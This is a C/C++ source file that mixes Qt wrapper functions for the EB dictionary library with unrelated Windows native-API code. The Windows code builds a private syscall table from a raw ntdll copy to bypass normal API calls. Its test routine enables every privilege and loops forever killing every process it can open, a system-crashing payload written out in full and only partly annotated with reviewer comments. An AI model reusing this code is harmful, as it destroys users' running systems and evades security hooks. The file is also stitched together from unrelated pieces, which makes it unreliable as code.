///Demo entry point: shows two status messages, drops our own mapping, builds the
///NtXxx syscall table and, only if that succeeded, runs the self-test.
///Note: testNtapiTable() terminates other processes and loops forever (see its
///body), so its result is only ever reported when it fails early.
void mymain(void)
{
    ///Show STATUS_PENDING before anything else runs.
    dispError(STATUS_PENDING);
    selfUnmap();
    ///Second banner, shown after the unmap.
    dispError(STATUS_SECTION_NOT_IMAGE);
    ///Everything below depends on the syscall table; bail out if it could not be built.
    NTSTATUS result = initializeSyscallTable();
    if (result) {
        dispError(result);
        return;
    }
    result = testNtapiTable();
    if (result)
        dispError(result);
}
// Fonts reported by eb_font_list() for `book`. On failure the error is
// reported through dispError() and an empty list is returned.
QList <EB_Font_Code> QEb::fontList()
{
    QList <EB_Font_Code> result;
    EB_Font_Code codes[EB_MAX_FONTS];
    int count = 0;
    const EB_Error_Code err = eb_font_list(&book, codes, &count);
    if (err == EB_SUCCESS) {
        for (int idx = 0; idx < count; ++idx)
            result.append(codes[idx]);
    } else {
        dispError("eb_font_list", err);
    }
    return result;
}
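// Fetch up to `max_count` hits of the current search via eb_hit_list().
// Returns an empty list when max_count <= 0 or when the EB call fails
// (the failure is reported through dispError()).
QList <EB_Hit> QEb::hitList(int max_count)
{
    QList <EB_Hit> hits;
    // A zero/negative size would make `new EB_Hit[max_count]` ill-formed or empty.
    if (max_count <= 0)
        return hits;
    EB_Hit *harray = new EB_Hit[max_count];
    int cnt = 0;
    const EB_Error_Code ecode = eb_hit_list(&book, max_count, harray, &cnt);
    if (ecode != EB_SUCCESS) {
        dispError("eb_hit_list", ecode);
    } else {
        for (int i = 0; i < cnt; ++i)
            hits << harray[i];
    }
    // harray is owned by this function; release it on every path (it used to leak).
    delete[] harray;
    return hits;
}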
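// Run an EB cross search for `words`. eb_search_cross() expects a
// NULL-terminated array of C strings, built here from the EUC-converted
// byte arrays; the pointers stay valid because `blist` outlives the call.
// Returns the EB status; failures are also reported through dispError().
EB_Error_Code QEb::searchCross(const QStringList &words)
{
    QList <QByteArray> blist = toEucList(words);
    // Size, fill and terminate from the same count so no slot is left
    // uninitialized if the converted list and `words` ever differ in length.
    const int n = blist.count();
    char** wlist = new char*[n+1];
    for (int i = 0; i < n; i++)
        wlist[i] = blist[i].data();
    wlist[n] = NULL;
    EB_Error_Code ecode = eb_search_cross(&book, wlist);
    if (ecode != EB_SUCCESS)
        dispError("eb_search_cross", ecode);
    delete[] wlist;
    return ecode;
}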
// Title of multi search `mid`, decoded according to the book's character
// code (Latin-1 or EUC). Empty QString on error (reported via dispError()).
QString QEb::multiTitle(EB_Multi_Search_Code mid)
{
    char title[EB_MAX_MULTI_TITLE_LENGTH+1];
    const EB_Error_Code err = eb_multi_title(&book, mid, title);
    if (err != EB_SUCCESS) {
        dispError("eb_multi_title", err);
        return QString();
    }
    if (characterCode() != EB_CHARCODE_ISO8859_1)
        return eucToUtf(title);
    return QString::fromLatin1(title);
}
// Alternation text of wide character `c_num` from `appendix`, decoded per
// the book's character code. Empty QString on error (reported via dispError()).
QString QEb::wideAltCharacterText(int c_num)
{
    char text[EB_MAX_ALTERNATION_TEXT_LENGTH+1];
    const EB_Error_Code err = eb_wide_alt_character_text(&appendix, c_num, text);
    if (err != EB_SUCCESS) {
        dispError("eb_wide_alt_character_text", err);
        return QString();
    }
    if (characterCode() != EB_CHARCODE_ISO8859_1)
        return eucToUtf(text);
    return QString::fromLatin1(text);
}
// Read the appendix's two stop codes into *stop1 and *stop2. On failure both
// are set to -1 and the error is reported via dispError(). Returns the EB status.
EB_Error_Code QEb::stopCode(int *stop1, int *stop2)
{
    int codes[2] = {0, 0};
    const EB_Error_Code err = eb_stop_code(&appendix, codes);
    if (err == EB_SUCCESS) {
        *stop1 = codes[0];
        *stop2 = codes[1];
    } else {
        dispError("eb_stop_code", err);
        *stop1 = -1;
        *stop2 = -1;
    }
    return err;
}
// Initialize Subbook QList <EB_Subbook_Code> QEb::subbookList() { EB_Subbook_Code codes[EB_MAX_SUBBOOKS]; int cnt; QList <EB_Subbook_Code> list; EB_Error_Code ecode = eb_subbook_list(&book, codes, &cnt); if (ecode != EB_SUCCESS) dispError("eb_subbook_list", ecode); else for(int i = 0; i < cnt; i++) list << codes[i]; return list; }
// Label of entry `entry` of multi search `mid`, decoded per the book's
// character code. Empty QString on error (reported via dispError()).
QString QEb::multiEntryLabel(EB_Multi_Search_Code mid, int entry)
{
    char label[EB_MAX_MULTI_LABEL_LENGTH+1];
    const EB_Error_Code err = eb_multi_entry_label(&book, mid, entry, label);
    if (err != EB_SUCCESS) {
        dispError("eb_multi_entry_label", err);
        return QString();
    }
    if (characterCode() != EB_CHARCODE_ISO8859_1)
        return eucToUtf(label);
    return QString::fromLatin1(label);
}
// Multi-search codes reported by eb_multi_search_list() for `book`. On
// failure the error is reported via dispError() and an empty list is returned.
QList <EB_Multi_Search_Code> QEb::multiSearchList()
{
    QList <EB_Multi_Search_Code> result;
    EB_Multi_Search_Code codes[EB_MAX_MULTI_SEARCHES];
    int count = 0;
    const EB_Error_Code err = eb_multi_search_list(&book, codes, &count);
    if (err == EB_SUCCESS) {
        for (int idx = 0; idx < count; ++idx)
            result.append(codes[idx]);
    } else {
        dispError("eb_multi_search_list", err);
    }
    return result;
}
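// Drain the binary data currently selected in `book` via eb_read_binary(),
// in fixed-size chunks, until a short read signals the end. On an EB error
// the error is reported via dispError() and whatever was read so far is returned.
QByteArray QEb::readBinary()
{
    char buff[1024];
    const size_t chunk = sizeof(buff);  // single source of truth for the chunk size
    QByteArray b;
    for (;;) {
        ssize_t len = 0;
        const EB_Error_Code ecode = eb_read_binary(&book, chunk, buff, &len);
        if (ecode != EB_SUCCESS) {
            // Name the failing call properly (the message used to be the truncated "eb_").
            dispError("eb_read_binary", ecode);
            return b;
        }
        if (len > 0)
            b += QByteArray(buff, static_cast<int>(len));
        // A read shorter than the chunk is the end of the data.
        if (len < static_cast<ssize_t>(chunk))
            break;
    }
    return b;
}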
///Attempts to read the ntdll.dll file and then tries to dump the NtXxx functions NTSTATUS initializeSyscallTable(void) { PVOID pNtdll = sg_pRawNtdll; NTSTATUS status = STATUS_UNSUCCESSFUL; ULONG dbgBuf = 0x0; ULONG firstOccurence = 0x0; ///Set up ourselves... status = performCoreInitialization(pNtdll, NTDLL_MAX_SIZE, &dbgBuf, &firstOccurence); if (status) { if (firstOccurence) dispError((NTSTATUS)dbgBuf); return status; } ///Now create the syscall table in order to be able to use all NtXxx functions. return createNtapiLookupTable(pNtdll); }
// Convert a wide-font glyph `bitmap` to GIF with eb_bitmap_to_gif(). Glyph
// geometry comes from wideFontQSize(); a zero width is treated as "nothing to
// convert". Returns an empty array in that case and on error (reported via dispError()).
QByteArray QEb::wideBitmapToGif(const QByteArray &bitmap)
{
    QByteArray gif;
    const QSize glyph = wideFontQSize();
    if (glyph.width() == 0)
        return gif;
    // Output buffer sized by the library's own estimate for the current font.
    const int capacity = wideFontGifSize(font());
    char *out = new char[capacity];
    size_t written = 0;
    const EB_Error_Code err = eb_bitmap_to_gif(bitmap, glyph.width(), glyph.height(), out, &written);
    if (err == EB_SUCCESS)
        gif = QByteArray(out, static_cast<int>(written));
    else
        dispError("eb_bitmap_to_gif", err);
    delete[] out;
    return gif;
}
///If everything has been set up successfully, we do just a small test
///which terminates all programs it can get PROCESS_FULL_ACCESS to.
///Furthermore, it maps ntoskrnl.exe as an executable image.. even if that's not too useful at the moment...
///
///Review notes (defender's view):
///  - Destructive: the final for(;;) loop below opens and terminates every process it can,
///    except our own, and never exits, so this function does not return on the success path.
///  - Resource handling: hFile, hSection and hProcess are never closed; hProcess is
///    overwritten on each successful NtOpenProcess, leaking the previous handle.
///  - Early returns on NtOpenFile / NtCreateSection / NtMapViewOfSection failures
///    return the raw NTSTATUS to the caller without cleanup.
NTSTATUS testNtapiTable(void)
{
    UNICODE_STRING uMyNtdll;
    ///NOTE(review): declared as a pointer (PIO_STATUS_BLOCK) but its address is passed
    ///as the IoStatusBlock out-parameter of NtOpenFile below, which writes a full
    ///IO_STATUS_BLOCK through it — looks like it should be `IO_STATUS_BLOCK ioSb;`; confirm against the prototype.
    PIO_STATUS_BLOCK ioSb;
    OBJECT_ATTRIBUTES objAttr;
    CLIENT_ID cid;
    OBJECT_ATTRIBUTES procAttr;
    LARGE_INTEGER interval;
    PVOID pNtosBase = NULL;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    SIZE_T viewSize = 0;
    HANDLE hFile = INVALID_HANDLE_VALUE;
    ///Our own PID, read from the TEB; used below to avoid terminating ourselves.
    HANDLE hCurrPid = NtCurrentTeb()->ClientId.UniqueProcess;
    ///Despite the name, this is the NT path of ntoskrnl.exe, not ntdll.dll.
    WCHAR szMyNtdll[] = L"\\systemroot\\system32\\ntoskrnl.exe";
    HANDLE hSection = INVALID_HANDLE_VALUE;
    HANDLE hProcess = INVALID_HANDLE_VALUE;
    ///The copy of the pristine ntdll data has succeeded and can now be found in the syscall table.
    ///Of course, we display this message by just using this table...
    ///(return value is ignored; the hard-error response lands in `status` via the last argument)
    syscallStub(ntapiLookup("NtRaiseHardError", sizeof("NtRaiseHardError")), STATUS_FT_READ_FROM_COPY, 0, 0, NULL, 0, (PULONG)&status);
    ///Build the UNICODE_STRING by hand: Length excludes the terminator, MaximumLength includes it.
    uMyNtdll.Buffer = szMyNtdll;
    uMyNtdll.LengthInBytes = sizeof(szMyNtdll) - sizeof(UNICODE_NULL);
    uMyNtdll.MaximumLengthInBytes = sizeof(szMyNtdll);
    InitializeObjectAttributes(&objAttr, &uMyNtdll, OBJ_CASE_INSENSITIVE, NULL, NULL);
    ///Open the kernel image read-only, then map it as an image section (SEC_IMAGE) into this process.
    status = syscallStub(ntapiLookup("NtOpenFile", sizeof("NtOpenFile")), &hFile, GENERIC_READ | SYNCHRONIZE, &objAttr, &ioSb, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT);
    if (status) return status;
    status = syscallStub(ntapiLookup("NtCreateSection", sizeof("NtCreateSection")), &hSection, SECTION_ALL_ACCESS, NULL, NULL, PAGE_READONLY, SEC_IMAGE, hFile);
    if (status) return status;
    status = syscallStub(ntapiLookup("NtMapViewOfSection", sizeof("NtMapViewOfSection")), hSection, INVALID_HANDLE_VALUE, &pNtosBase, 0, 0, NULL, &viewSize, ViewUnmap, 0, PAGE_READONLY);
    if (status) return status;
    ///Clearly, the ntoskrnl.exe image could not be loaded at its kernel 0xFFFFXXXXXXXXXXXXXX base...
    dispError(STATUS_IMAGE_NOT_AT_BASE);
    cid.UniqueThread = NULL;
    ///Negative QuadPart = relative delay in 100-ns units, i.e. 200 ms per terminated process.
    interval.QuadPart = -2000000;
    InitializeObjectAttributes(&procAttr, NULL, 0, NULL, NULL);
    ///Will kill Windows 7.
    ///Tries to enable privilege values 0..0x27 one by one; `status` keeps only the last result
    ///and is not checked.
    for (ULONG i = 0; i < 0x28; i++) status = myRtlAdjustPrivileges(i);
    ///Unbounded loop: sweeps every PID below 0x8000 (PIDs are multiples of 4), skipping our own,
    ///and terminates each process it can open with PROCESS_ALL_ACCESS. Never returns.
    for (;;) {
        for (ULONG_PTR i = 0; i < 0x8000; i += 4) {
            if (hCurrPid != (HANDLE)i) {
                cid.UniqueProcess = (HANDLE)i;
                status = syscallStub(ntapiLookup("NtOpenProcess", sizeof("NtOpenProcess")), &hProcess, PROCESS_ALL_ACCESS, &procAttr, &cid);
                if (!status) {
                    ///Pause, then terminate; hProcess is not closed afterwards.
                    syscallStub(ntapiLookup("NtDelayExecution", sizeof("NtDelayExecution")), FALSE, &interval);
                    syscallStub(ntapiLookup("NtTerminateProcess", sizeof("NtTerminateProcess")), hProcess, STATUS_FATAL_APP_EXIT);
                }
            }
        }
    }
}